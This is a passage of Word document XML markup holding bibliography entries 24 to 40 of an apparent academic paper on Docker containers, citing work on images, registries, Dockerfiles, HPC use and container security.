                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 100, pp. 1665-1671, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="49E0506A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0DD57720" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[24] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5147C869" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker, “Docker overview | Docker Documentation,” docker, [Online]. Available: https://docs.docker.com/get-started/overview/. [Accessed 20 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0A046368" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3D79DE68" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[25] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="075604D7" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. Nüst, V. Sochat, B. Marwick and et.al, “Ten simple rules for writing Dockerfiles for reproducible data science,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">PLOS Computational Biology, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 16, no. 11, p. e1008316, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5EF27BDA" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="65664234" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[26] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1F06B24A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">C. Zheng, L. Rupprecht, V. Tarasov and et.al, “Wharf: Sharing Docker Images in a Distributed File System,” in </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Proceeding of the ACM Symposium on Cloud Computing</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, Carlsbad, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1D74B5AD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1786322A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[27] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="123F322D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. Skourtis, L. Rupprecht and V. Tarasov, “Carving perfect layers out of docker images,” in </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>HotCloud 19</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="47F234AD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="216A72B5" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[28] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0BBF60D3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker, “About storage drivers | Docker Documentation,” docker, [Online]. Available: https://docs.docker.com/storage/storagedriver/. [Accessed 21 July 2020].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4267A524" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="31DBA944" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[29] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="52F95611" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Bhat, “Understanding the Dockerfile,” in </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Practical Docker with Python</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>, Springer, 2018, pp. 53-89.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2B1B42B9" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1D371D30" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[30] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="66677C5F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">J. Sparks, “Enabling Docker for HPC,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Concurrency and Computation: Practice and Experience, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 31, no. 16, p. e5018, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="79808EF3" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4FDB707F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[31] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3077A84E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">N. Khandhar and S. Shah, “Docker-The Future of Virtualization,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">International Journal of Research and Analytical Reviews, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 6, no. 2, pp. 164-167, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="312BA5A2" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="53F8FF94" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[32] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1271C1FC" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">R. Muddinagiri, S. Ambavane and S. Bayas, “Self-Hosted Kubernetes: Deploying Docker Containers Locally with Minikube,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceeding - 1st International Conference on Innovative Trends and Advances in Engineering and Technology, ICITAET 2019, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 239-243, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="27AB6F5F" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="727DFD75" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[33] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="667167E3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. B. Ayed, J. Subercaze, F. Laforest and e. al, “Docker2RDF: Lifting the Docker Registry Hub into RDF,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2017 IEEE World Congress on Services (SERVICES), </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 36-39, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0C83C135" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="76DC454F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[34] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7B5BD192" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">N. Mohd, M. Mydin, I. Ismail and e. al, “An Operational View into Docker Registry with Scalability, Access Control and Image Assessment Bukhary ikhwan Ismail Malaysian Institute of Microelectronic Systems An Operational View into Docker Registry with Scalability, Access Control and Image Assessm,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">researchgate, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-5, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2362996C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3597C8C6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[35] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1AFE2874" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker, “Docker Security,” docker, [Online]. Available: https://docs.docker.com/engine/security/. [Accessed 6 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2AC63455" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="18A48F51" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[36] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7C1ACA0C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. M. Joy, “Performance comparison between Linux containers and virtual machines,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Conference Proceeding - 2015 International Conference on Advances in Computer Engineering and Applications, ICACEA 2015, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 342-346, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1F10C407" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="10D27208" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[37] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="746D4584" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">E. Bacis, S. Mutti, S. Capelli and e. el, “DockerPolicyModules: Mandatory Access Control for Docker containers,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2015 IEEE Conference on Communications and NetworkSecurity, CNS 2015, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 749-750, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4356CA18" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="613D09BF" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[38] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7DABCFFB" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">R. Rosen, “Linux containers and the future cloud,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Linux J, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 240, no. 4, pp. 86-95, 2014. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3881BE8B" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7393C292" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[39] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="069C62AA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">K. Oh, J. Park and Y. I. Eom, “Weight-Based Page Cache Management Scheme for Enhancing I/O Proportionality of Cgroups,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2019 IEEE International Conference on Consumer Electronics, ICCE 2019, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-3, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5C3CA840" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6477A978" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[40] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5DAD4BAA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
